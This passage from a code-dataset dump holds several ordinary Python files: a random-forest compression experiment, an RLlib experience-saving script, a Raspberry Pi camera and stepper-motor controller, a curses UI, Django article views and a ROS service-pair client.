n_splits=10, delta=1):\n scores = []\n means = []\n for i in range(num_experiments):\n agreement, mean_score = robustness_exp(dataset, max_tree_depth, forest_depth, num_trees, num_experiments=1,\n score=score, weight=weight, n_splits=n_splits, use_agreement=True, delta=delta)\n means.append(mean_score)\n scores.append(agreement)\n\n print('\\nFinal results:')\n scores = np.asarray(scores)\n scores = scores.mean(axis=0)\n print(f'Average Agreement score: RF {scores[0]}, BM {scores[1]}, VT {scores[2]}, MED {scores[3]}')\n\n\ndef robustness_exp(dataset, max_tree_depth, forest_depth, num_trees, num_experiments=1,\n score='accuracy', weight=None, n_splits=10, use_agreement=False, delta=1):\n\n kf_scores = []\n kf = KFold(n_splits=n_splits)\n x, y, X_test, y_test = datasets.prepare_data(dataset, return_test=True)\n c = datasets.get_number_of_classes(dataset)\n score_func, score_metric = metrics.get_socre_foncs(score)\n\n trees = []\n for train, test in kf.split(x):\n X_train, _, y_train, _ = x[train], x[test], y[train], y[test]\n X_train, X_val, y_train, y_val = datasets.prepare_val(X_train, y_train)\n k_scores = []\n for k in range(num_experiments):\n rf, _, f_med, f_all, f_m = compress_tree(num_trees, max_tree_depth, forest_depth, X_train, y_train,\n c, weight=weight, X_val=X_val, y_val=y_val,\n score=score_metric, delta=delta)\n\n k_scores.append(score_func(rf, None, f_med, f_all, f_m, X_train, y_train, X_test, y_test))\n\n trees.append((rf, f_m, f_all, f_med))\n kf_scores.append(metrics.average_scores(k_scores, num_experiments))\n\n means = metrics.mean_and_std(kf_scores, mean_only=True)\n output = metrics.agreement_score(trees, X_test) if use_agreement else None\n return output, means\n\n\ndef generalization_exp(dataset, max_tree_depth, forest_depth, num_trees, num_experiments=1,\n score='accuracy', weight=None, n_splits=10, delta=1):\n\n kf_scores = []\n kf = KFold(n_splits=n_splits)\n x, y, _, _, = datasets.prepare_data(dataset, return_test=False)\n c = datasets.get_number_of_classes(dataset)\n score_func, score_metric = metrics.get_socre_foncs(score)\n\n for k in range(num_experiments):\n f_scores = []\n for train, test in kf.split(x):\n X_train, X_test, y_train, y_test = x[train], x[test], y[train], y[test]\n X_train, X_val, y_train, y_val = datasets.prepare_val(X_train, y_train)\n rf, _, f_med, f_all, f_m = compress_tree(num_trees, max_tree_depth, forest_depth, X_train, y_train,\n c, weight=weight, X_val=X_val, y_val=y_val,\n score=score_metric, delta=delta)\n\n f_scores.append(score_func(rf, None, f_med, f_all, f_m, X_train, y_train, X_test, y_test))\n\n mean_var_win = metrics.mean_and_std(f_scores, mean_only=False)\n kf_scores.append(mean_var_win)\n\n print('\\nFinal results:')\n print(f'Average RF mean {sum([score[0] for score in kf_scores]) / num_experiments}, var {sum([score[1] for score in kf_scores]) / num_experiments}')\n idx = 2\n for t in ('BM', 'VT', 'MED'):\n t_mean = sum([score[idx] for score in kf_scores]) / num_experiments\n t_wins = sum([score[idx + 2] for score in kf_scores]) / num_experiments\n idx += 3\n print(f'Average {t} mean {t_mean}, wins {t_wins}')\n\n return\n", "sub_path": "rf_compression.py", "file_name": "rf_compression.py", "file_ext": "py", "file_size_in_byte": 5573, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "numpy.concatenate", "line_number": 16, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 17, "usage_type": "call"}, {"api_name": "sklearn.tree.DecisionTreeClassifier", "line_number": 20, "usage_type": "call"}, {"api_name": "hypothesis.TreeHypothesis", "line_number": 22, "usage_type": "call"}, {"api_name": "sklearn.ensemble.RandomForestClassifier", "line_number": 25, "usage_type": "call"}, {"api_name": "hypothesis.TreeHypothesis", "line_number": 32, "usage_type": "call"}, {"api_name": "consistency.MCConsistentTree", "line_number": 35, "usage_type": "call"}, {"api_name": "hypothesis_search.MCHypothesisSearch", "line_number": 36, "usage_type": "call"}, {"api_name": "algorithms.crembo", "line_number": 38, "usage_type": "call"}, {"api_name": "sklearn.tree.DecisionTreeClassifier", "line_number": 41, "usage_type": "call"}, {"api_name": "hypothesis.TreeHypothesis", "line_number": 43, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 59, "usage_type": "call"}, {"api_name": "sklearn.model_selection.KFold", "line_number": 68, "usage_type": "call"}, {"api_name": "datasets.prepare_data", "line_number": 69, "usage_type": "call"}, {"api_name": "datasets.get_number_of_classes", "line_number": 70, "usage_type": "call"}, {"api_name": "metrics.get_socre_foncs", "line_number": 71, "usage_type": "call"}, {"api_name": "datasets.prepare_val", "line_number": 76, "usage_type": "call"}, {"api_name": "metrics.average_scores", "line_number": 86, "usage_type": "call"}, {"api_name": "metrics.mean_and_std", "line_number": 88, "usage_type": "call"}, {"api_name": "metrics.agreement_score", "line_number": 89, "usage_type": "call"}, {"api_name": "sklearn.model_selection.KFold", "line_number": 97, "usage_type": "call"}, {"api_name": "datasets.prepare_data", "line_number": 98, "usage_type": "call"}, {"api_name": "datasets.get_number_of_classes", "line_number": 99, "usage_type": "call"}, {"api_name": "metrics.get_socre_foncs", "line_number": 100, "usage_type": "call"}, {"api_name": "datasets.prepare_val", "line_number": 106, "usage_type": "call"}, {"api_name": "metrics.mean_and_std", "line_number": 113, "usage_type": "call"}]}
+{"seq_id": "216255556", "text": "\"\"\"Collect and save experiencies in IndustrialBenchmark with a behaviour policy.\"\"\"\nimport click\nimport numpy as np\nfrom ib_behavior_policy import IBBehaviorPolicy\nfrom ray.rllib.evaluation.sample_batch_builder import SampleBatchBuilder\nfrom ray.rllib.offline.json_writer import JsonWriter\nfrom tqdm import trange\n\nfrom raylab.envs.registry import _industrial_benchmark_maker\n\n\n@click.command()\n@click.option(\n \"--local-dir\",\n \"-l\",\n type=click.Path(exists=False, file_okay=False, dir_okay=True, resolve_path=True),\n default=\"data/\",\n show_default=True,\n help=\"\",\n)\ndef main(local_dir):\n \"\"\"Main loop based on `rllib.examples.saving_experiences`.\"\"\"\n # pylint: disable=too-many-locals\n batch_builder = SampleBatchBuilder()\n writer = JsonWriter(local_dir)\n env = _industrial_benchmark_maker({\"max_episode_steps\": 1000})\n policy = IBBehaviorPolicy(env.observation_space, env.action_space, {})\n\n for eps_id in trange(100):\n obs = env.reset()\n prev_action = np.zeros_like(env.action_space.sample())\n prev_reward = 0\n done = False\n time = 0\n while not done:\n action, _, _ = policy.compute_single_action(obs, [])\n new_obs, rew, done, info = env.step(action)\n batch_builder.add_values(\n t=time,\n eps_id=eps_id,\n agent_index=0,\n obs=obs,\n actions=action,\n action_prob=1.0, # put the true action probability here\n rewards=rew,\n prev_actions=prev_action,\n prev_rewards=prev_reward,\n dones=done,\n infos=info,\n new_obs=new_obs,\n )\n obs = new_obs\n prev_action = action\n prev_reward = rew\n time += 1\n writer.write(batch_builder.build_and_reset())\n\n\nif __name__ == \"__main__\":\n main() # pylint: disable=no-value-for-parameter\n", "sub_path": "examples/BatchRL/ib_save_experiences.py", "file_name": "ib_save_experiences.py", "file_ext": "py", "file_size_in_byte": 1972, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "ray.rllib.evaluation.sample_batch_builder.SampleBatchBuilder", "line_number": 24, "usage_type": "call"}, {"api_name": "ray.rllib.offline.json_writer.JsonWriter", "line_number": 25, "usage_type": "call"}, {"api_name": "raylab.envs.registry._industrial_benchmark_maker", "line_number": 26, "usage_type": "call"}, {"api_name": "ib_behavior_policy.IBBehaviorPolicy", "line_number": 27, "usage_type": "call"}, {"api_name": "tqdm.trange", "line_number": 29, "usage_type": "call"}, {"api_name": "numpy.zeros_like", "line_number": 31, "usage_type": "call"}, {"api_name": "click.command", "line_number": 12, "usage_type": "call"}, {"api_name": "click.option", "line_number": 13, "usage_type": "call"}, {"api_name": "click.Path", "line_number": 16, "usage_type": "call"}]}
+{"seq_id": "169527426", "text": "import pysony\nimport board, neopixel\nimport time\nimport urllib.request as req\nimport RPi.GPIO as GPIO\nfrom pathlib import Path\n\nclass FixtureInspectorController:\n QX_ADDR = \"http://192.168.122.1:8080\"\n\n search = None\n cameras = None\n camera = None\n\n halfstep = 0\n control_pins = [22, 24, 23, 25]\n halfstep_seq = [\n [1,0,0,0],\n [1,1,0,0],\n [0,1,0,0],\n [0,1,1,0],\n [0,0,1,0],\n [0,0,1,1],\n [0,0,0,1],\n [1,0,0,1]\n ]\n\n def __init__(self):\n self.setupCam()\n self.setupStepmotor()\n\n def setupCam(self):\n # print(\"Searching for camera...\")\n\n # self.search = pysony.ControlPoint(interface=\"wlan0\")\n # self.cameras = self.search.discover()\n\n # if len(self.cameras):\n # print(\"Found: %s\" % self.cameras[0])\n # print(\"\")\n # self.camera = pysony.SonyAPI(QX_ADDR=self.cameras[0])\n # else:\n # print(\"No camera found, aborting\")\n # quit()\n self.camera = pysony.SonyAPI(QX_ADDR=self.QX_ADDR)\n\n self.camera.startRecMode()\n time.sleep(5)\n\n self.camera.setFocusMode('AF-S')\n self.camera.setPostviewImageSize('Original')\n self.camera.setFNumber('22')\n self.camera.setIsoSpeedRate('100')\n self.camera.setShutterSpeed('1/20')\n self.camera.setTouchAFPosition([50.0, 50.0])\n\n\n def setupStepmotor(self):\n for pin in self.control_pins:\n GPIO.setup(pin, GPIO.OUT)\n GPIO.output(pin, 0)\n \n # 1 halfstep is 0.9 degree\n # 100 halfstep is 90 degree\n def Stepmotor(self, step):\n for i in range(abs(step)):\n for pin in range(4):\n GPIO.output(self.control_pins[pin], self.halfstep_seq[self.halfstep][pin])\n\n if step > 0:\n self.halfstep += 1\n if self.halfstep == 8:\n self.halfstep = 0\n else:\n self.halfstep -= 1\n if self.halfstep == -1:\n self.halfstep = 7\n\n time.sleep(0.001)\n \n def Stepmotor_idle(self):\n for pin in range(4):\n GPIO.output(self.control_pins[pin], GPIO.LOW)\n\n def resetStep(self):\n self.halfstep = 0\n\n def TakePicture(self, filename=\"image.jpg\"):\n res = self.camera.actTakePicture()\n res = req.urlretrieve(res['result'][0][0].replace('\\/', '/'), filename)\n\nif __name__ == '__main__':\n filename = \".jpg\"\n\n fictrl = FixtureInspectorController()\n \n fictrl.pixelOn()\n\n st0 = time.time()\n for i in range(100):\n st1 = time.time()\n fictrl.camera.setTouchAFPosition([50.0, 50.0])\n for j in range(4):\n print('i : ' + str(i) + ' j : ' + str(j))\n st2 = time.time()\n res = fictrl.camera.actTakePicture()\n print('picture taken : ' + str(time.time()-st2))\n res = req.urlretrieve(res['result'][0][0].replace('\\/', '/'),\n str(Path.cwd()) + \"/temp_\" + str(100).zfill(4) + \"/\" + str(j).zfill(3) + '_' + str(i).zfill(3) + filename)\n print('image download : ' + str(time.time()-st2))\n fictrl.Stepmotor(-100)\n print('motor rotated : ' + str(time.time()-st2))\n print('a cycle done : ' + str(time.time()-st1))\n fictrl.pixelOff()\n", "sub_path": "fixins/fixinsctrl.py", "file_name": "fixinsctrl.py", "file_ext": "py", "file_size_in_byte": 2973, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "pysony.SonyAPI", "line_number": 45, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 48, "usage_type": "call"}, {"api_name": "RPi.GPIO.setup", "line_number": 60, "usage_type": "call"}, {"api_name": "RPi.GPIO", "line_number": 60, "usage_type": "name"}, {"api_name": "RPi.GPIO.OUT", "line_number": 60, "usage_type": "attribute"}, {"api_name": "RPi.GPIO.output", "line_number": 61, "usage_type": "call"}, {"api_name": "RPi.GPIO", "line_number": 61, "usage_type": "name"}, {"api_name": "RPi.GPIO.output", "line_number": 68, "usage_type": "call"}, {"api_name": "RPi.GPIO", "line_number": 68, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 79, "usage_type": "call"}, {"api_name": "RPi.GPIO.output", "line_number": 83, "usage_type": "call"}, {"api_name": "RPi.GPIO", "line_number": 83, "usage_type": "name"}, {"api_name": "RPi.GPIO.LOW", "line_number": 83, "usage_type": "attribute"}, {"api_name": "urllib.request.urlretrieve", "line_number": 90, "usage_type": "call"}, {"api_name": "urllib.request", "line_number": 90, "usage_type": "name"}, {"api_name": "time.time", "line_number": 99, "usage_type": "call"}, {"api_name": "time.time", "line_number": 101, "usage_type": "call"}, {"api_name": "time.time", "line_number": 105, "usage_type": "call"}, {"api_name": "time.time", "line_number": 107, "usage_type": "call"}, {"api_name": "urllib.request.urlretrieve", "line_number": 108, "usage_type": "call"}, {"api_name": "urllib.request", "line_number": 108, "usage_type": "name"}, {"api_name": "pathlib.Path.cwd", "line_number": 109, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 109, "usage_type": "name"}, {"api_name": "time.time", "line_number": 110, "usage_type": "call"}, {"api_name": "time.time", "line_number": 112, "usage_type": "call"}, {"api_name": "time.time", "line_number": 113, "usage_type": "call"}]}
+{"seq_id": "327510687", "text": "#!/usr/bin/python\n\nimport commands\nimport curses\nimport time\nimport threading\n\nclass CursesUI(threading.Thread):\n \"\"\"A curses UI or talking to a driver via client\"\"\"\n def __init__(self, allow_input):\n \"\"\"Initializes ncurses\"\"\"\n threading.Thread.__init__(self, name='curses-ui')\n\n # used to stop the UI loop\n self._stop = threading.Event()\n\n # if False, ignore all comnmands, just print status\n self.allow_input = allow_input\n\n # keep track of the last keystroke\n # it is cleared and returned by get_command\n self._last_key = None\n\n def init(self):\n \"\"\"Sets up ncurses and creates all the windows\"\"\"\n #initialize ncurses\n self.stdscr = curses.initscr()\n self.windows = {'stdscr':self.stdscr}\n\n curses.start_color()\n curses.noecho()\n curses.cbreak()\n self.stdscr.keypad(1)\n\n curses.curs_set(0)\n curses.halfdelay(1)\n\n #initialize the status and result windows\n self.windows['time'] = self.create_window(' Time ', 3, 82, 0, 0)\n\n self.windows['driver'] = self.create_window(' Driver Status ', 12, 40, 3, 0)\n self.windows['monitor'] = self.create_window(' Monitor Status ', 12, 40, 3, 41)\n self.windows['arduino'] = self.create_window(' Arduino Status ', 10, 40, 14, 0)\n self.windows['sensors'] = self.create_window(' Sensor Status ', 10, 40, 14, 41)\n self.windows['result'] = self.create_window(' Last Result ', 3, 82, 25, 0)\n\n def cleanup(self):\n \"\"\"Clean up ncurses\"\"\"\n self.stdscr.keypad(0)\n curses.nocbreak()\n curses.echo()\n\n curses.endwin()\n\n def run(self):\n \"\"\"The main loop\"\"\"\n while not self._stop.is_set():\n self.write_line(self.windows['time'], 1, \"%.2f\" % time.time(), align = 'center')\n for window in self.windows.values():\n window.refresh()\n\n if self.allow_input:\n try:\n self._last_key = self.stdscr.getkey()\n except:\n pass\n\n def stop(self):\n \"\"\"Stops the UI loop\"\"\"\n self._stop.set()\n self.join()\n self.cleanup()\n\n def create_window(self, title, height, width, top, left, border = True):\n \"\"\"Creates a window\"\"\"\n window = curses.newwin(height, width, top, left)\n\n if border:\n window.box()\n if title:\n self.write_line(window, 0, title, left_margin = 3, nopad = True)\n\n self.windows['stdscr'].refresh()\n return window\n\n def write_key_value(self, window, linenum, key, value):\n \"\"\"Properly formats and writes a key-value pair\"\"\"\n key = str(key)\n value = str(value)\n\n max_width = window.getmaxyx()[1] - 2 #subtract 2 for borders\n key_len = max_width - len(value) - 1 #subtract 1 for the space between k and v\n\n line = \"%s %s\" % (key[:key_len].ljust(key_len), value)\n self.write_line(window, linenum, line)\n\n def write_line(self, window, linenum, line, align = 'left', left_margin = 1, right_margin = 1, nopad = False):\n \"\"\"Writes a line in the specified window\"\"\"\n h, w = window.getmaxyx()\n if linenum > h:\n return\n\n #truncate the string to fit perfectly inside the window\n if not nopad:\n length = w - left_margin - right_margin\n # first trim too-long lines\n line = line[:w-2]\n\n # next justify the line\n align_fun = {\n 'left':line.ljust,\n 'right':line.rjust,\n 'center':line.center,\n }\n line = align_fun[align](length)\n\n window.addstr(linenum, left_margin, line)\n\n def write_result(self, result):\n self.write_line(self.windows['result'], 1, str(result))\n\n def update_status(self, status):\n \"\"\"puts the current status into the status windows\"\"\"\n for cat, s in status.items():\n if cat == 'sensors':\n continue\n\n window = self.windows[cat]\n linenum = 1\n for key, val in s.items():\n if key == 'alerts':\n # print out monitor alerts\n self.write_line(window, linenum, 'Alerts:')\n linenum += 1\n for k, v in val.items():\n self.write_key_value(window, linenum, ' '+k, v)\n linenum += 1\n else:\n self.write_key_value(window, linenum, key, val)\n linenum += 1\n\n sen_line = 1\n for sen in status['sensors']:\n val = \"%s%s\" % (sen['value'], sen['units'])\n self.write_key_value(self.windows['sensors'], sen_line, sen['name'], val)\n sen_line += 1\n\n def get_command(self):\n \"\"\"Returns the user's last command\"\"\"\n try:\n if self._last_key == 'q':\n return commands.Quit()\n elif self._last_key == 'g':\n return commands.Go()\n elif self._last_key == 'r':\n return commands.Reset()\n elif self._last_key == 's':\n return commands.Stop()\n elif self._last_key == 't':\n return commands.Shutdown()\n elif self._last_key == 'b':\n return commands.Brake(1)\n elif self._last_key == 'h':\n return commands.Hold()\n elif self._last_key == 'KEY_LEFT':\n return commands.Steer(direction=-1)\n elif self._last_key == 'KEY_RIGHT':\n return commands.Steer(direction=1)\n elif self._last_key == 'KEY_DOWN':\n return commands.Drive(speed=-1)\n elif self._last_key == 'KEY_UP':\n return commands.Drive(speed=1)\n\n else:\n return None\n\n finally:\n self._last_key = None\n self.cleanup()\n\n def error_notify(self, error):\n \"\"\"Displays the error in the results window\"\"\"\n self.write_result(\"Error at %.2f: %s\" % (time.time(), str(error)))\n\ndef get_ui(allow_input, **rest):\n return CursesUI(allow_input)\n\nif __name__ == \"__main__\":\n ui = get_ui()\n ui.init()\n\n ui.start()\n try:\n while True:\n time.sleep(0.05)\n\n command = ui.get_command()\n if not command:\n continue\n if type(command) == commands.Quit:\n break\n else:\n ui.write_result(\"command was %s\" % str(command))\n finally:\n ui.stop()\n\n\n", "sub_path": "client/cursesui.py", "file_name": "cursesui.py", "file_ext": "py", "file_size_in_byte": 6658, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "threading.Thread", "line_number": 8, "usage_type": "attribute"}, {"api_name": "threading.Thread.__init__", "line_number": 12, "usage_type": "call"}, {"api_name": "threading.Thread", "line_number": 12, "usage_type": "attribute"}, {"api_name": "threading.Event", "line_number": 15, "usage_type": "call"}, {"api_name": "curses.initscr", "line_number": 27, "usage_type": "call"}, {"api_name": "curses.start_color", "line_number": 30, "usage_type": "call"}, {"api_name": "curses.noecho", "line_number": 31, "usage_type": "call"}, {"api_name": "curses.cbreak", "line_number": 32, "usage_type": "call"}, {"api_name": "curses.curs_set", "line_number": 35, "usage_type": "call"}, {"api_name": "curses.halfdelay", "line_number": 36, "usage_type": "call"}, {"api_name": "curses.nocbreak", "line_number": 50, "usage_type": "call"}, {"api_name": "curses.echo", "line_number": 51, "usage_type": "call"}, {"api_name": "curses.endwin", "line_number": 53, "usage_type": "call"}, {"api_name": "time.time", "line_number": 58, "usage_type": "call"}, {"api_name": "curses.newwin", "line_number": 76, "usage_type": "call"}, {"api_name": "commands.Quit", "line_number": 152, "usage_type": "call"}, {"api_name": "commands.Go", "line_number": 154, "usage_type": "call"}, {"api_name": "commands.Reset", "line_number": 156, "usage_type": "call"}, {"api_name": "commands.Stop", "line_number": 158, "usage_type": "call"}, {"api_name": "commands.Shutdown", "line_number": 160, "usage_type": "call"}, {"api_name": "commands.Brake", "line_number": 162, "usage_type": "call"}, {"api_name": "commands.Hold", "line_number": 164, "usage_type": "call"}, {"api_name": "commands.Steer", "line_number": 166, "usage_type": "call"}, {"api_name": "commands.Steer", "line_number": 168, "usage_type": "call"}, {"api_name": "commands.Drive", "line_number": 170, "usage_type": "call"}, {"api_name": "commands.Drive", "line_number": 172, "usage_type": "call"}, {"api_name": "time.time", "line_number": 183, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 195, "usage_type": "call"}, {"api_name": "commands.Quit", "line_number": 200, "usage_type": "attribute"}]}
+{"seq_id": "631547177", "text": "from django.http import HttpResponse\n\narticles_list = [\n [1, \"Айви Яптанго\", 2020, \"Самые шикарные парочки знаменитостей 2019 года\", [\"красота\", \"гороскопы\"]],\n [2, \"Лео Месси\", 2014, \"Un Abrazo a Todos\", [\"лайфстайл\", \"недвижимость\"]],\n [3, \"Гэри Паска\", 2016, \"Продаётся дом в Южной Флориде за $2,695\", [\"недвижимость\", \"коучинг\", \"howto\"]],\n [4, \"Роби Тобинсон\", 1967, \"7 лет я применял этот трюк и назад пути нет\", [\"лайфхак\", \"коучинг\", \"howto\"]],\n [5, \"Металлий Вутко\", 2017, \"Let Me Speak From My Heart\", [\"футбол\", \"допинг\"]],\n [6, \"Роби Тобинсон\", 1977, \"Беспроигрышная древнеримская техника обольщения\", [\"отношения\", \"история\", \"howto\"]],\n [7, \"Роби Тобинсон\", 2022, \"3 способа установить девайс от храпа\", [\"здоровье\", \"коучинг\", \"howto\"]],\n [8, \"Роби Тобинсон\", 1975, \"Интимная проблема, которой втайне озабочены все ваши друзья\", [\"отношения\", \"здоровье\", \"howto\"]],\n [9, \"Elina Shake\", 2008, \"Представления, основанные на классах\", [\"python\", \"howto\", \"лайфхак\"]],\n [10, \"Бен Ф��анклин\", 1753, \"Электрические стодолларовые купюры\", [\"фондовая биржа\", \"рынки\", \"электричество\"]],\n [11, \"Роби Тобинсон\", 2012, \"5 забавных Django Apps, о которых говорят все\", [\"django\", \"IT\", \"howto\"]],\n [12, \"Металлий Вутко\", 2017, \"No Problems, No Criminality\", [\"допинг\", \"недвижимость\"]],\n [13, \"Роби Тобинсон\", 1987, \"7 способов до смерти напугать своего босса в пятницу 13-го\", [\"работа\", \"мистика\", \"howto\"]],\n [14, \"Твентин Карантино\", 2007, \"Четыре сервера\", [\"кино\", \"django\", \"мистика\"]],\n]\n\n\n# в функции generate_html()\n# оформим перечень статей в виде html-списка\ndef generate_html(articles):\n if len(articles) == 0:\n return 'По вашему запросу не найдено ни одной статьи!
'\n else:\n base_html = 'Статьи по вашему запросу:
'\n for article in articles:\n list_item = f'' \\\n f'- {article[3]}
' \\\n f'- автор: {article[1]}
' \\\n f'- год: {article[2]}
' \\\n f'- теги: {\", \".join(article[4])}
' \\\n f'
'\n base_html += list_item\n base_html += '
'\n return base_html\n\n\n# на случай, если в адресе не указан год - установим значение year=-1\ndef dashboard(request, year=-1):\n found_articles = []\n if year == -1:\n # если в адресе не указан год,\n # записываем в found_articles все статьи нашего блога\n found_articles = articles_list\n else:\n for article in articles_list:\n if year == article[2]:\n found_articles.append(article)\n beautiful_html = generate_html(found_articles)\n return HttpResponse(beautiful_html)\n\n\ndef article_by_id(request, id):\n found_articles = []\n for article in articles_list:\n if id == article[0]:\n found_articles.append(article)\n beautiful_html = generate_html(found_articles)\n return HttpResponse(beautiful_html)\n\n\ndef articles_by_tag(request, tag):\n found_articles = []\n for article in articles_list:\n if tag in article[4]:\n found_articles.append(article)\n beautiful_html = generate_html(found_articles)\n return HttpResponse(beautiful_html)\n\n", "sub_path": "articles/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 4230, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "django.http.HttpResponse", "line_number": 52, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 61, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 70, "usage_type": "call"}]}
+{"seq_id": "568614897", "text": "#\n# License: BSD\n# https://raw.github.com/robotics-in-concert/rocon_tools/license/LICENSE\n#\n##############################################################################\n# Imports\n##############################################################################\n\nimport threading\nimport time\nimport rospy\nimport uuid\nimport unique_id\nimport functools\n\n# Local imports\nfrom .exceptions import ServicePairException\n\n##############################################################################\n# Request Handlers\n##############################################################################\n\n\nclass RequestHandlerBase(object):\n\n def __init__(self, key):\n self.key = key # uuid hexstring key (the request_handlers key)\n self.response = None\n\n\nclass BlockingRequestHandler(RequestHandlerBase):\n\n def __init__(self, key):\n super(BlockingRequestHandler, self).__init__(key)\n self.event = threading.Event()\n\n\nclass NonBlockingRequestHandler(RequestHandlerBase):\n\n def __init__(self, key, callback, error_callback):\n super(NonBlockingRequestHandler, self).__init__(key)\n self.timer = None\n self.callback = callback\n self.error_callback = error_callback\n\n def copy(self):\n '''\n The deepcopy function has some issues (related to threads),\n so using this independant copy method here. Note that this only\n ever gets used for non-blocking calls to help handle the\n race conditions between timeout handling and normal callback\n handling\n '''\n new_copy = NonBlockingRequestHandler(self.key, self.callback, self.error_callback)\n new_copy.timer = self.timer\n return new_copy\n\n##############################################################################\n# Client Class\n##############################################################################\n\n\nclass ServicePairClient(object):\n '''\n The client side of a pubsub service pair.\n '''\n __slots__ = [\n '_publisher',\n '_subscriber',\n '_request_handlers', # initiate, track and execute requests with these { hex string ids : dic of RequestHandler objects (Blocking/NonBlocking) }\n 'ServicePairSpec',\n 'ServicePairRequest',\n 'ServicePairResponse',\n '_lock' # prevent race conditions in handling of non-blocking callbacks and timeouts.\n ]\n\n ##########################################################################\n # Initialisation\n ##########################################################################\n\n def __init__(self, name, ServicePairSpec):\n '''\n @param name : resource name of service pair (e.g. testies for pair topics testies/request, testies/response)\n @type str\n @param ServicePairSpec : the pair type (e.g. rocon_service_pair_msgs.msg.TestiesPair)\n @type str\n '''\n try:\n p = ServicePairSpec()\n self.ServicePairSpec = ServicePairSpec\n self.ServicePairRequest = type(p.pair_request)\n self.ServicePairResponse = type(p.pair_response)\n except AttributeError:\n raise ServicePairException(\"Type is not an pair spec: %s\" % str(ServicePairSpec))\n self._lock = threading.Lock()\n self._subscriber = rospy.Subscriber(name + \"/response\", self.ServicePairResponse, self._internal_callback)\n self._publisher = rospy.Publisher(name + \"/request\", self.ServicePairRequest)\n self._request_handlers = {} # [uuid_msgs/UniqueId]\n\n def wait_for_service(self, timeout):\n '''\n Waits for the service pair server to appear.\n\n @param timeout : time to wait for data\n @type rospy.Duration\n\n @raise ROSException: if specified timeout is exceeded\n @raise ROSInterruptException: if shutdown interrupts wait\n '''\n timeout_time = time.time() + timeout.to_sec()\n while not rospy.is_shutdown() and time.time() < timeout_time:\n if self._subscriber.get_num_connections() > 0 and self._publisher.get_num_connections() > 0:\n return\n rospy.rostime.wallsleep(0.1)\n if rospy.is_shutdown():\n raise rospy.ROSInterruptException(\"rospy shutdown\")\n else:\n raise rospy.ROSException(\"timeout exceeded while waiting for service pair server %s\" % self._subscriber.resolved_name[:-len('/response')])\n\n ##########################################################################\n # Execute Blocking/NonBlocking\n ##########################################################################\n\n def __call__(self, msg, timeout=None, callback=None, error_callback=None):\n '''\n Initiates and executes the client request to the server. The type of arguments\n supplied determines whether to apply blocking or non-blocking behaviour.\n\n @param msg : the request message\n @type Request\n\n @param timeout : time to wait for data\n @type rospy.Duration\n\n @param callback : user callback invoked for responses of non-blocking calls\n @type method with arguments (uuid_msgs.UniqueID, Response)\n\n @return msg/id : for blocking calls it is the response message, for non-blocking it is the unique id\n @rtype Response/uuid_msgs.UniqueID\n '''\n pair_request_msg = self.ServicePairRequest()\n pair_request_msg.id = unique_id.toMsg(unique_id.fromRandom())\n pair_request_msg.request = msg\n key = unique_id.toHexString(pair_request_msg.id)\n if callback == None and error_callback == None:\n self._request_handlers[key] = BlockingRequestHandler(key)\n return self._make_blocking_call(self._request_handlers[key], pair_request_msg, timeout)\n else:\n request_handler = NonBlockingRequestHandler(key, callback, error_callback)\n self._request_handlers[key] = request_handler.copy()\n self._make_non_blocking_call(request_handler, pair_request_msg, timeout)\n return pair_request_msg.id\n\n ##########################################################################\n # Private Support Methods\n ##########################################################################\n\n def _make_blocking_call(self, request_handler, msg, timeout):\n '''\n @param request_handler : information and event handler for the request\n @type RequestHandler\n\n @param msg : the request pair message structure\n @type self.ServicePairRequest\n '''\n self._publisher.publish(msg)\n if timeout is None:\n request_handler.event.wait()\n else:\n request_handler.event.wait(timeout.to_sec())\n if request_handler.response is not None:\n response = request_handler.response\n else:\n response = None\n del self._request_handlers[request_handler.key]\n return response\n\n def _make_non_blocking_call(self, request_handler, msg, timeout):\n '''\n @param request_handler : a copy of information and event handler for the request (used for the timer)\n @type RequestHandler\n\n @param msg : the request pair message structure\n @type self.ServicePairRequest\n '''\n self._publisher.publish(msg)\n if timeout is not None:\n # bind the key so the timer callback knows which request to handle.\n delete_request_handler = functools.partial(self._timer_callback, request_handler=request_handler)\n request_handler.timer = rospy.Timer(timeout, delete_request_handler, oneshot=True)\n\n def _timer_callback(self, unused_event, request_handler):\n '''\n Handle a timeout for non-blocking requests. This will call the user's defined error callback function\n (with args: (uuid_msgs.UniqueID, str)).\n\n @param event : regular rospy timer event object (not used)\n\n @param request_handler : a copy of the handler that gets bound when this callback is passed into the timer\n @type NonBlockingRequestHandler\n\n @todo respond on the error callback.\n '''\n already_handled = False\n self._lock.acquire()\n try:\n del self._request_handlers[request_handler.key]\n except KeyError:\n already_handled = True\n self._lock.release()\n if not already_handled:\n if request_handler.error_callback is not None:\n request_handler.error_callback(unique_id.toMsg(uuid.UUID(request_handler.key)), \"timeout\")\n\n def _internal_callback(self, msg):\n '''\n @param msg : message returned from the server (with pair id etc)\n @type self.ServicePairResponse\n '''\n # Check if it is a blocking call that has requested it.\n key = unique_id.toHexString(msg.id)\n already_handled = False\n non_blocking_request_handler = None\n self._lock.acquire()\n try:\n request_handler = self._request_handlers[key]\n request_handler.response = msg.response\n if isinstance(request_handler, BlockingRequestHandler):\n request_handler.event.set()\n already_handled = True\n else: # NonBlocking\n # make a copy and delete so we can release the lock. Process after.\n non_blocking_request_handler = request_handler.copy()\n del self._request_handlers[key]\n except KeyError:\n already_handled = True # it's either a blocking, or a non-blocking call handled by the timeout\n self._lock.release()\n if not already_handled:\n # Could use EAFP approach here since they will almost never be None, but this is more readable\n if non_blocking_request_handler.callback is not None:\n request_handler.callback(msg.id, msg.response)\n", 